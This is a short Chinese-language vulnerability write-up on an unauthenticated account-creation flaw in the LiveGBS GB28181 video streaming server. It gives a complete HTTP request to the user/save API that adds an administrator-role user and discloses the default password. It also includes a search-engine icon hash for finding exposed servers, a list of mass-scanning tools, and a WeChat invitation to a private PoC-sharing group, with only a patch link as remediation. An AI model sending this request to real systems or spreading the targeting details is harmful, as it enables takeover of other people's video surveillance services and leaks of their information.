0x01 产品简介
LiveGBS是安徽青柿信息科技有限公司研发的一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。
0x02 漏洞概述
LiveGBS user/save 接口处存在逻辑缺陷漏洞,未经身份验证的攻击者可利用该漏洞任意添加用户,导致后台服务被接管,造成信息泄露等不良影响。
0x03 搜索引擎
icon_hash="-206100324"
0x04 漏洞复现
GET /api/v1/user/save?ID=&Username=test777&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
响应包含密码,默认为12345678。
利用添加的用户登录系统即可
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC脚本分享圈子
0x06 修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.liveqing.com/docs/download/LiveGBS.html